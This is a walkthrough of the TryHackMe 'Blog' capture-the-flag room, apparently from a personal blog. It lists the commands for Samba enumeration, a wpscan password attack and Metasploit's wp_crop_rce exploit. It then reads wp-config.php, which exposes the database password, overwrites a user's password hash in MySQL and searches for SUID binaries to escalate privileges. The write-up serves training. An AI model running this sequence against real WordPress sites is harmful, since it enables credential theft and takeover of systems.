Billy Joel made a WordPress blog! Can you hack it?
TryHackMe Blog Room Walktrough Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome!
Billy Joel WordPress Blog!
TryHackMe Blog Room Link: https://tryhackme.com/room/blog
Enumerate this box and find the 2 flags that are hiding on it! Billy has some weird things going on his laptop. Can you maneuver around and get what you need? Or will you fall down the rabbit hole…
In order to get the blog to work with AWS, you’ll need to add blog.thm to your /etc/hosts file.
Credit to Sq00ky for the root privesc idea 😉
TryHackMe Blog Room Walktrough
On this Lab we need to attack a WordPress blog and extract two flags and answer three questions about the system.
First I will scan the server using Nmap in order to find open ports and what services are running on each port, since we know that we are attacking a WordPress blog let’s execute gobuster to find some hidden folders.
Learning Topics:
- Scanning
- Samba Enumeration
- Stenography
- Exploiting WordPress
- Password Cracking
- Linux Privilege Escalation
Prepare Host Access
In order to test this machine effectively is necessary to add the host IP into our hosts file.
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ vi /etc/hosts
<IP> blog.thm
Enumerate Host
Verify open ports and Services with Nmap
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ nmap 10.10.238.30Enumerate Samba
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ smbmap -H 10.10.238.30
Connect to Samba
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ smbclient //10.10.238.30/BillySMB
Download files
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ steghide extract -sf Alice-White-Rabbit.jpg
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ cat rabbit_hole.txt
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ exiftool tswift.mp4
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ exiftool Alice-White-Rabbit.jpg
Enumerate WordPress Blog
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ wpscan --url http://10.10.238.30/ --passwords passwords.txt
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ use exploit/multi/http/wp_crop_rce
Privilege Escation
Read more about: Linux Privilege Escalation
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ python -c 'import pty; pty.spawn("/bin/bash")'export SHELL=bash
export TERM=xterm256-color
stty rows 38 columns 116┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ cat wp-config.phpdefine('DB_NAME', 'blog');
/** MySQL database username */
define('DB_USER', 'wordpressuser');
/** MySQL database password */
define('DB_PASSWORD', 'LittleYellow--RFS');┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ mysql -u wordpressuser -h localhost -p
UPDATE wp_users
SET
user_pass = '$P$BedNwvQ29vr1TPd80CDl6WnHy--RFS'
WHERE
user_nicename = "bjoel";find / -perm -u=s -type f 2>/dev/null[email protected]:/var/www/wordpress$ /usr/sbin/checker
